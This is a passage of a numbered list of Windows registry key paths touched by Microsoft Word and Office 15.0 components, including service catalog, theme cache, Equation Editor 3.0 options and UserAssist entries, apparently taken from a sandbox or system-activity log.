  1023. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceUrl",
  1024. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata",
  1025. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
  1026. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
  1027. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\KeyTip",
  1028. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\RegularExpression",
  1029. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\Type",
  1030. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails",
  1031. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url16x16",
  1032. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url32x32",
  1033. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url48x48",
  1034. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT",
  1035. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Capabilities",
  1036. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ConnectMechanism",
  1037. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsManaged",
  1038. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsRemovable",
  1039. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceOwner",
  1040. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SortOrder",
  1041. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SupportsMultiple",
  1042. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Description",
  1043. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Name",
  1044. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceId",
  1045. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceUrl",
  1046. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails",
  1047. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url16x16",
  1048. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url32x32",
  1049. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url48x48",
  1050. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE",
  1051. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Capabilities",
  1052. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ConnectMechanism",
  1053. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsManaged",
  1054. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsRemovable",
  1055. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceOwner",
  1056. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SortOrder",
  1057. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SupportsMultiple",
  1058. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Description",
  1059. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Name",
  1060. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceId",
  1061. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceUrl",
  1062. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails",
  1063. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url16x16",
  1064. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url32x32",
  1065. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url48x48",
  1066. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE",
  1067. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Capabilities",
  1068. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ConnectMechanism",
  1069. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsManaged",
  1070. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsRemovable",
  1071. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceOwner",
  1072. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SortOrder",
  1073. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SupportsMultiple",
  1074. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\CapabilitiesMetadata",
  1075. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Description",
  1076. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Name",
  1077. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceId",
  1078. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceUrl",
  1079. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata",
  1080. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
  1081. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
  1082. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\KeyTip",
  1083. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\RegularExpression",
  1084. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\Type",
  1085. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails",
  1086. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url16x16",
  1087. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url32x32",
  1088. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url48x48",
  1089. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\ProductFiles",
  1090. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
  1091. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
  1092. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1786DAE\\187AC9E",
  1093. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090434",
  1094. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457503",
  1095. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033917",
  1096. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457510",
  1097. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001105",
  1098. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033919",
  1099. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457464",
  1100. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457475",
  1101. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033925",
  1102. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033927",
  1103. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457485",
  1104. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033937",
  1105. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001106",
  1106. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033921",
  1107. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457444",
  1108. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090430",
  1109. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457515",
  1110. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457496",
  1111. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033929",
  1112. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457491",
  1113. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001103",
  1114. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001104",
  1115. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328998",
  1116. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328990",
  1117. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328951",
  1118. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328983",
  1119. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328975",
  1120. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328986",
  1121. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328972",
  1122. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328940",
  1123. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328935",
  1124. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328932",
  1125. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328925",
  1126. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328919",
  1127. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328908",
  1128. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328916",
  1129. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328884",
  1130. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM02835233",
  1131. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM01840907",
  1132. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851224",
  1133. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851223",
  1134. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851226",
  1135. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851227",
  1136. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851220",
  1137. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851219",
  1138. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851222",
  1139. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851221",
  1140. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851218",
  1141. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851217",
  1142. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851225",
  1143. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851216",
  1144. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998158",
  1145. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998159",
  1146. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328893",
  1147. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328905",
  1148. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F100A0C00000000000F01FEC\\Usage\\SpellingAndGrammarFiles_3082",
  1149. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F100C0400000000000F01FEC\\Usage\\SpellingAndGrammarFiles_1036",
  1150. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F10090400000000000F01FEC\\Usage\\SpellingAndGrammarFiles_1033",
  1151. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Licensing\\09D07EFC505F4D9CBFD5ACE3217F6654",
  1152. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\EquationEditorFilesIntl_1033",
  1153. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options",
  1154. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General",
  1155. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Zoom",
  1156. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\CustomZoom",
  1157. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ShowAll",
  1158. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Version",
  1159. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ForceOpen",
  1160. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDocked",
  1161. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarShown",
  1162. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDockPos",
  1163. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\MTUpgradeDialog",
  1164. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes",
  1165. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Full",
  1166. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Script",
  1167. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\ScriptScript",
  1168. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Symbol",
  1169. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\SubSymbol",
  1170. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing",
  1171. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LineSpacing",
  1172. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixRowSpacing",
  1173. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixColSpacing",
  1174. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SuperscriptHeight",
  1175. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubscriptDepth",
  1176. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimHeight",
  1177. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimDepth",
  1178. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimLineSpacing",
  1179. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\NumerHeight",
  1180. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\DenomDepth",
  1181. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarOver",
  1182. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarThick",
  1183. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubFractBarThick",
  1184. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FenceOver",
  1185. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SpacingFactor",
  1186. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MinGap",
  1187. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\RadicalGap",
  1188. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\EmbellGap",
  1189. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\PrimeHeight",
  1190. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts",
  1191. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Text",
  1192. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Function",
  1193. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Variable",
  1194. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\LCGreek",
  1195. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\UCGreek",
  1196. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Symbol",
  1197. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Vector",
  1198. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Number",
  1199. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User1",
  1200. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User2",
  1201. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows",
  1202. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\EquationWindow",
  1203. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\SpacingWindow",
  1204. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\TextLanguage",
  1205. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\MathLanguage",
  1206. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  1207. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  1208. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithList\\MRUList",
  1209. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR",
  1210. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
  1211. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\S38OS404-1Q43-42S2-9305-67QR0O28SP23\\rkcybere.rkr",
  1212. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.106\\CheckSetting",
  1213. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.101\\CheckSetting",
  1214. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.103\\CheckSetting",
  1215. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.100\\CheckSetting",
  1216. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.102\\CheckSetting",
